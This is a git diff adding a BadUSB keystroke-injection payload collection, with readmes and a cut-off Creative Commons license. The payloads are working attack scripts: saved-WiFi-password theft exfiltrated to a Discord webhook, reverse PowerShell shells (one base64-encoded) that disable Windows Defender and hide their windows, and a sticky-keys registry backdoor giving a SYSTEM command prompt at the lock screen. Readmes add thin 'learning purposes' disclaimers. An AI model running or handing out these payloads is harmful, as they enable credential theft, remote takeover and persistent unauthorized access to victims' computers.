-DestinationPath C:PUT PATH HERE\ResultsPassword.zip ; exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/readme.md new file mode 100644 index 000000000..f9ecd47e5 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/readme.md @@ -0,0 +1,37 @@ + +# StealWifiKeys +Steals all of the saved Wifi Passwords and stores them into a file. + +## How to use? + +This script is not plug and play. You will need to do the following changes: + +- change destination path "-DestinationPath C:PUT PATH HERE\ResultsPassword.zip" + + +## Features + +- open powershell +- grab wifi keys +- store keys to a file + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/StealWifiKeys_Discord.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/StealWifiKeys_Discord.txt new file mode 100644 index 000000000..5e2793348 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/StealWifiKeys_Discord.txt @@ -0,0 +1,21 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Steals all of the saved Wifi Passwords and sends them to a discord webhook. +REM Version: 1.0 +REM Category: Passwords +DELAY 750 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 1200 +ALT y +DELAY 1200 +GUI UP +DELAY 1200 +STRING $hookurl = "DISCORD WEBHOOK URL"; $folderDateTime = (get-date).ToString('d-M-y HHmmss'); $userDir = (Get-ChildItem env:\userprofile).value + '\UNC0V3R3D ' + $folderDateTime; $fileSaveDir = New-Item ($userDir) -ItemType Directory; $date = get-date; netsh wlan export profile key=clear folder=$fileSaveDir; Compress-Archive -Path $fileSaveDir -DestinationPath c:\results-74935290.zip; $Body = @{'username' = $env:username; 'content' = "Obiwan: Hello there!"}; Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json); curl.exe -F 'file1=@c:\results-74935290.zip' $hookurl; +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/readme.md new file mode 100644 index 000000000..c91823b29 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/readme.md @@ -0,0 +1,36 @@ + +# StealWifiKeys_Discord +Steals all of the saved Wifi Passwords, stores them to a file and uplaods the file to a discord webhook. + +## How to use? + +This script is not plug and play. You will need to do the following changes: + +- change webhook url + + +## Features + +- open powershell +- grab wifi keys +- store keys to a file +- sends file to discord webhook + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/StealWifiKeys_onUSB.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/StealWifiKeys_onUSB.txt new file mode 100644 index 000000000..1457b5203 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/StealWifiKeys_onUSB.txt @@ -0,0 +1,20 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Steals all of the saved Wifi Passwords and stores them into a USB device of your choice. +REM Version: 1.0 +REM Category: Passwords +DELAY 750 +WINDOWS d +DELAY 1000 +WINDOWS r +DELAY 900 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 900 +ALT y +DELAY 900 +GUI UP +DELAY 900 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath File path on USB device here \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/readme.md new file mode 100644 index 000000000..93400394e --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/readme.md @@ -0,0 +1,37 @@ + +# StealWifiKeys_onUSB +Steals all of the saved Wifi Passwords and stores them into a file, then puts the file on a usb device connected to the target pc. + +## How to use? + +This script is not plug and play and only for experienced users. You will need to do the following changes: + +- change path to the usb device "-DestinationPath File path on USB device here" + + +## Features + +- open powershell +- grab wifi keys +- store keys to a file on a usb device + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/better-rev-shell.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/better-rev-shell.txt new file mode 100644 index 000000000..da239a432 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/better-rev-shell.txt @@ -0,0 +1,35 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Better reverse PowerShell. In case of problems, please open an issue. +REM Version: 1.0 +REM Category: Remote-Access +DELAY 750 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 700 +STRING Set-MpPreference -DisableRealtimeMonitoring $true +ENTER +DELAY 700 +STRING Add-Type -MemberDefinition @'[DllImport("user32.dll")] public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);'@ -Name WinAPI -Namespace Win32 -PassThru;$Window=[Win32.WinAPI]::FindWindow("ConsoleWindowClass",(Get-Process -Id $PID).MainWindowTitle);$Win32.WinAPI::ShowWindow($Window,0) +DELAY 700 +STRING ip = 'YOUR-IP HERE'; +ENTER +DELAY 700 +STRING port = 'PORT HERE'; +ENTER +DELAY 700 +STRING encoded_command = 'cG93ZXJzaGVsbCAtbm9wIC1XIGhpZGRlbiAtbm9uaSAtZXAgYnlwYXNzIC1jICIkVENQQ2xpZW50ID0gTmV3LU9iamVjdCBOZXQuU29ja2V0cy5UQ1BDbGllbnQoJzx1c2VyX2RlZmluZWRfaXA+JywgPHVzZXJfZGVmaW5lZF9wb3J0Pik7JE5ldHdvcmtTdHJlYW0gPSAkVENQQ2xpZW50LkdldFN0cmVhbSgpOyRTdHJlYW1Xcml0ZXIgPSBOZXctT2JqZWN0IElPLlN0cmVhbVdyaXRlcigkTmV0d29ya1N0cmVhbSk7ZnVuY3Rpb24gV3JpdGVUb1N0cmVhbSAoJFN0cmluZykge1tieXRlW11dJHNjcmlwdDpCdWZmZXIgPSAwLi4kVENQQ2xpZW50LlJlY2VpdmVCdWZmZXJTaXplIHwgJSB7MH07JFN0cmVhbVdyaXRlci5Xcml0ZSgkU3RyaW5nICsgJ1NIRUxMPiAnKTskU3RyZWFtV3JpdGVyLkZsdXNoKCl9V3JpdGVUb1N0cmVhbSAnJzt3aGlsZSgoJEJ5dGVzUmVhZCA9ICROZXR3b3JrU3RyZWFtLlJlYWQoJEJ1ZmZlciwgMCwgJEJ1ZmZlci5MZW5ndGgpKSAtZ3QgMCkgeyRDb21tYW5kID0gKFt0ZXh0LmVuY29kaW5nXTo6VVRGOCkuR2V0U3RyaW5nKCRCdWZmZXIsIDAsICRCeXRlc1JlYWQgLSAxKTskT3V0cHV0ID0gdHJ5IHtJbnZva2UtRXhwcmVzc2lvbiAkQ29tbWFuZCAyPiYxIHwgT3V0LVN0cmluZ30gY2F0Y2ggeyRfIHwgT3V0LVN0cmluZ31Xcml0ZVRvU3RyZWFtICgkT3V0cHV0KX0kU3RyZWFtV3JpdGVyLkNsb3NlKCki' +ENTER +DELAY 700 +STRING -e encoded_command +ENTER +DELAY 2000 +STRING -e JFdpbmRvdz0kV2luQVBJOjpGaW5kV2luZG93KCJDb25zb2xlV2luZG93Q2xhc3MiLChHZXQtUHJvY2VzcyAtSWQgJFBJRCkuTWFpbldpbmRvd1RpdGxlKTskV2luQVBJOjpTaG93V2luZG93KCRXaW5kb3csMCk= +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/readme.md new file mode 100644 index 000000000..274cfd171 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/readme.md @@ -0,0 +1,41 @@ + +# Better-Rev-Shell + +This script is for learning purposes only. I am not responsible for your actions and not going to help you setting up the scripts as I don't want to get into trouble. I do/will not support any illegal activities. + + + + +## How to use? + +This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible. + + + + +## Features + +- x + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt new file mode 100644 index 000000000..38752a93d --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt @@ -0,0 +1,100 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Creates a command prompt "backdoor" that can be launched in almost any "secure" Windows environment, +REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times) or the keyboard combination Alt+Shift+PrtScr. +REM This then results in launching the command prompt in the same account as the current environment, i.e. SYSTEM or your user account. +REM Version: 1.0 +REM Category: Remote_Access +REM plug in second USB in before the Flipper +DELAY 3000 +CONTROL ESCAPE +DELAY 500 +STRING notepad +DELAY 250 +ENTER +DELAY 750 +STRING @echo off +ENTER +STRING :init +ENTER +STRING setlocal DisableDelayedExpansion +ENTER +STRING set cmdInvoke=1 +ENTER +STRING set winSysFolder=System32 +ENTER +STRING set "batchPath=%~0" +ENTER +STRING for %%k in (%0) do set batchName=%%~nk +ENTER +STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs" +ENTER +STRING setlocal EnableDelayedExpansion +ENTER +STRING :checkPrivileges +ENTER +STRING NET FILE 1>NUL 2>NUL +ENTER +STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges) +ENTER +STRING :getPrivileges +ENTER +STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges) +ENTER +STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%" +ENTER +STRING echo args = "ELEV " >> "%TEMPVBS%" +ENTER +STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%" +ENTER +STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%" +ENTER +STRING echo Next>> "%TEMPVBS%" +ENTER +STRING if '%cmdInvoke%'=='1' goto InvokeCmd +ENTER +STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%" +ENTER +STRING goto ExecElevation +ENTER +STRING :InvokeCmd +ENTER +STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%" +ENTER +STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%TEMPVBS%" +ENTER +STRING :ExecElevation +ENTER +STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %* +ENTER +STRING exit /B +ENTER +STRING :gotPrivileges +ENTER +STRING setlocal & cd /d "%~dp0." +ENTER +STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1) +ENTER +STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end +ENTER +STRING cls +ENTER +STRING echo Payload Install Failed +ENTER +STRING pause +ENTER +STRING :end +ENTER +STRING del /F /Q "%~0" && exit +CONTROL s +DELAY 500 +STRING %temp%\run.bat +TAB +STRING a +ENTER +DELAY 250 +ALT F4 +DELAY 250 +CONTROL ESCAPE +DELAY 500 +STRING %temp%\run.bat +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/readme.md new file mode 100644 index 000000000..7caa7ba7a --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/readme.md @@ -0,0 +1,33 @@ + +# CommandLineBackdoor +This script is for learning purposes only. I am not responsible for your actions and not going to help you with anything. + +## How to use? + +This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible. + + +## Features + +- x + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/ReversePowershell.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/ReversePowershell.txt new file mode 100644 index 000000000..36db3151e --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/ReversePowershell.txt @@ -0,0 +1,59 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Reverse-PowerShell Windows. I am not responsible for your actions. +REM Version: 1.0 +REM Category: Remote_Access +DELAY 750 +GUI r +DELAY 1000 +STRING powershell Start-Process notepad -Verb runAs +ENTER +DELAY 750 +ALT y +DELAY 750 +ENTER +ALT SPACE +DELAY 1000 +STRING m +DELAY 1000 +DOWNARROW +REPEAT 100 +ENTER +STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()’ +ENTER +DELAY 750 +STRING Set-MpPreference -DisableRealtimeMonitoring $true +DELAY 500 +ENTER +DELAY 750 +STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1” +ENTER +STRING Remove-Item $MyINvocation.InvocationName +ENTER +CTRL s +DELAY 1000 +STRING C:\Windows\config-34593.ps1 +ENTER +DELAY 1000 +ALT F4 +DELAY 750 +GUI r +DELAY 750 +STRING powershell Start-Process cmd -Verb runAs +ENTER +DELAY 750 +ALT y +DELAY 1000 +STRING mode con:cols=14 lines=1 +ENTER +ALT SPACE +DELAY 750 +STRING m +DELAY 750 +DOWNARROW +REPEAT 100 +ENTER +STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false +ENTER +DELAY 750 +STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1 +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/readme.md new file mode 100644 index 000000000..18be229cf --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/readme.md @@ -0,0 +1,33 @@ + +# ReversePowershell +This script is for learning purposes only. I am not responsible for your actions and not going to help you setting up the scripts as I don't want to get into trouble. I do/will not support any illegal activities. + +## How to use? + +This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible. + + +## Features + +- x + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/iPhone_open_website.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/iPhone_open_website.txt new file mode 100644 index 000000000..c661cd240 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/iPhone_open_website.txt @@ -0,0 +1,15 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Open any website on an iPhone. +REM Version: 1.0 +REM Category: iPhone +DELAY 1000 +GUI SPACE +DELAY 500 +STRING safari +DELAY 500 +ENTER +DELAY 1000 +REM Insert your website below :) +STRING www.yourwebsite.com +DELAY 500 +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/readme.md new file mode 100644 index 000000000..ec4c0cb77 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/readme.md @@ -0,0 +1,42 @@ + +# iPhone_open_website + +This script will open any website on an iPhone. + + + + +## How to use? + +This script is not plug and play. Insert the url that you want to open right here "STRING www.yourwebsite.com" + + + + +## Features + +- open website + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/language.ps1 b/BadUSB/UNC0V3R3D-BadUSB-Collection/language.ps1 new file mode 100644 index 000000000..4443b5768 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/language.ps1 @@ -0,0 +1 @@ +Write-Output “This is just the language file so just ignore it” diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/license.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/license.md new file mode 100644 index 000000000..e3fe2f600 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/license.md @@ -0,0 +1,175 @@ +# Attribution-NonCommercial-ShareAlike 4.0 International + +Creative Commons Corporation (“Creative Commons”) is not a law firm and does not provide legal services or legal advice. Distribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons makes its licenses and related information available on an “as-is” basis. Creative Commons gives no warranties regarding its licenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all liability for damages resulting from their use to the fullest extent possible. + +### Using Creative Commons Public Licenses + +Creative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may use to share original works of authorship and other material subject to copyright and certain other rights specified in the public license below. The following considerations are for informational purposes only, are not exhaustive, and do not form part of our licenses. + +* __Considerations for licensors:__ Our public licenses are intended for use by those authorized to give the public permission to use material in ways otherwise restricted by copyright and certain other rights. Our licenses are irrevocable. Licensors should read and understand the terms and conditions of the license they choose before applying it. Licensors should also secure all rights necessary before applying our licenses so that the public can reuse the material as expected. Licensors should clearly mark any material not subject to the license. This includes other CC-licensed material, or material used under an exception or limitation to copyright. [More considerations for licensors](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). + +* __Considerations for the public:__ By using one of our public licenses, a licensor grants the public permission to use the licensed material under specified terms and conditions. If the licensor’s permission is not necessary for any reason–for example, because of any applicable exception or limitation to copyright–then that use is not regulated by the license. Our licenses grant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed material may still be restricted for other reasons, including because others have copyright or other rights in the material. A licensor may make special requests, such as asking that all changes be marked or described. Although not required by our licenses, you are encouraged to respect those requests where reasonable. [More considerations for the public](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). + +## Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International Public License + +By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions. + +### Section 1 – Definitions. + +a. __Adapted Material__ means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image. + +b. __Adapter's License__ means the license You apply to Your Copyright and Similar Rights in Your contributions to Adapted Material in accordance with the terms and conditions of this Public License. + +c. __BY-NC-SA Compatible License__ means a license listed at [creativecommons.org/compatiblelicenses](http://creativecommons.org/compatiblelicenses), approved by Creative Commons as essentially the equivalent of this Public License. + +d. __Copyright and Similar Rights__ means copyright and/or similar rights closely related to copyright including, without limitation, performance, broadcast, sound recording, and Sui Generis Database Rights, without regard to how the rights are labeled or categorized. For purposes of this Public License, the rights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights. + +e. __Effective Technological Measures__ means those measures that, in the absence of proper authority, may not be circumvented under laws fulfilling obligations under Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996, and/or similar international agreements. + +f. __Exceptions and Limitations__ means fair use, fair dealing, and/or any other exception or limitation to Copyright and Similar Rights that applies to Your use of the Licensed Material. + +g. __License Elements__ means the license attributes listed in the name of a Creative Commons Public License. The License Elements of this Public License are Attribution, NonCommercial, and ShareAlike. + +h. __Licensed Material__ means the artistic or literary work, database, or other material to which the Licensor applied this Public License. + +i. __Licensed Rights__ means the rights granted to You subject to the terms and conditions of this Public License, which are limited to all Copyright and Similar Rights that apply to Your use of the Licensed Material and that the Licensor has authority to license. + +h. __Licensor__ means the individual(s) or entity(ies) granting rights under this Public License. + +i. __NonCommercial__ means not primarily intended for or directed towards commercial advantage or monetary compensation. For purposes of this Public License, the exchange of the Licensed Material for other material subject to Copyright and Similar Rights by digital file-sharing or similar means is NonCommercial provided there is no payment of monetary compensation in connection with the exchange. + +j. __Share__ means to provide material to the public by any means or process that requires permission under the Licensed Rights, such as reproduction, public display, public performance, distribution, dissemination, communication, or importation, and to make material available to the public including in ways that members of the public may access the material from a place and at a time individually chosen by them. + +k. __Sui Generis Database Rights__ means rights other than copyright resulting from Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as well as other essentially equivalent rights anywhere in the world. + +l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning. + +### Section 2 – Scope. + +a. ___License grant.___ + + 1. Subject to the terms and conditions of this Public License, the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive, irrevocable license to exercise the Licensed Rights in the Licensed Material to: + + A. reproduce and Share the Licensed Material, in whole or in part, for NonCommercial purposes only; and + + B. produce, reproduce, and Share Adapted Material for NonCommercial purposes only. + + 2. __Exceptions and Limitations.__ For the avoidance of doubt, where Exceptions and Limitations apply to Your use, this Public License does not apply, and You do not need to comply with its terms and conditions. + + 3. __Term.__ The term of this Public License is specified in Section 6(a). + + 4. __Media and formats; technical modifications allowed.__ The Licensor authorizes You to exercise the Licensed Rights in all media and formats whether now known or hereafter created, and to make technical modifications necessary to do so. The Licensor waives and/or agrees not to assert any right or authority to forbid You from making technical modifications necessary to exercise the Licensed Rights, including technical modifications necessary to circumvent Effective Technological Measures. For purposes of this Public License, simply making modifications authorized by this Section 2(a)(4) never produces Adapted Material. + + 5. __Downstream recipients.__ + + A. __Offer from the Licensor – Licensed Material.__ Every recipient of the Licensed Material automatically receives an offer from the Licensor to exercise the Licensed Rights under the terms and conditions of this Public License. + + B. __Additional offer from the Licensor – Adapted Material.__ Every recipient of Adapted Material from You automatically receives an offer from the Licensor to exercise the Licensed Rights in the Adapted Material under the conditions of the Adapter’s License You apply. + + C. __No downstream restrictions.__ You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, the Licensed Material if doing so restricts exercise of the Licensed Rights by any recipient of the Licensed Material. + + 6. __No endorsement.__ Nothing in this Public License constitutes or may be construed as permission to assert or imply that You are, or that Your use of the Licensed Material is, connected with, or sponsored, endorsed, or granted official status by, the Licensor or others designated to receive attribution as provided in Section 3(a)(1)(A)(i). + +b. ___Other rights.___ + + 1. Moral rights, such as the right of integrity, are not licensed under this Public License, nor are publicity, privacy, and/or other similar personality rights; however, to the extent possible, the Licensor waives and/or agrees not to assert any such rights held by the Licensor to the limited extent necessary to allow You to exercise the Licensed Rights, but not otherwise. + + 2. Patent and trademark rights are not licensed under this Public License. + + 3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes. + +### Section 3 – License Conditions. + +Your exercise of the Licensed Rights is expressly made subject to the following conditions. + +a. ___Attribution.___ + + 1. If You Share the Licensed Material (including in modified form), You must: + + A. retain the following if it is supplied by the Licensor with the Licensed Material: + + i. identification of the creator(s) of the Licensed Material and any others designated to receive attribution, in any reasonable manner requested by the Licensor (including by pseudonym if designated); + + ii. a copyright notice; + + iii. a notice that refers to this Public License; + + iv. a notice that refers to the disclaimer of warranties; + + v. a URI or hyperlink to the Licensed Material to the extent reasonably practicable; + + B. indicate if You modified the Licensed Material and retain an indication of any previous modifications; and + + C. indicate the Licensed Material is licensed under this Public License, and include the text of, or the URI or hyperlink to, this Public License. + + 2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner based on the medium, means, and context in which You Share the Licensed Material. For example, it may be reasonable to satisfy the conditions by providing a URI or hyperlink to a resource that includes the required information. + + 3. If requested by the Licensor, You must remove any of the information required by Section 3(a)(1)(A) to the extent reasonably practicable. + +b. ___ShareAlike.___ + +In addition to the conditions in Section 3(a), if You Share Adapted Material You produce, the following conditions also apply. + + 1. The Adapter’s License You apply must be a Creative Commons license with the same License Elements, this version or later, or a BY-NC-SA Compatible License. + + 2. You must include the text of, or the URI or hyperlink to, the Adapter's License You apply. You may satisfy this condition in any reasonable manner based on the medium, means, and context in which You Share Adapted Material. + + 3. You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, Adapted Material that restrict exercise of the rights granted under the Adapter's License You apply. + +### Section 4 – Sui Generis Database Rights. + +Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material: + +a. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, reuse, reproduce, and Share all or a substantial portion of the contents of the database for NonCommercial purposes only; + +b. if You include all or a substantial portion of the database contents in a database in which You have Sui Generis Database Rights, then the database in which You have Sui Generis Database Rights (but not its individual contents) is Adapted Material, including for purposes of Section 3(b); and + +c. You must comply with the conditions in Section 3(a) if You Share all or a substantial portion of the contents of the database. + +For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights. + +### Section 5 – Disclaimer of Warranties and Limitation of Liability. + +a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__ + +b. __To the extent possible, 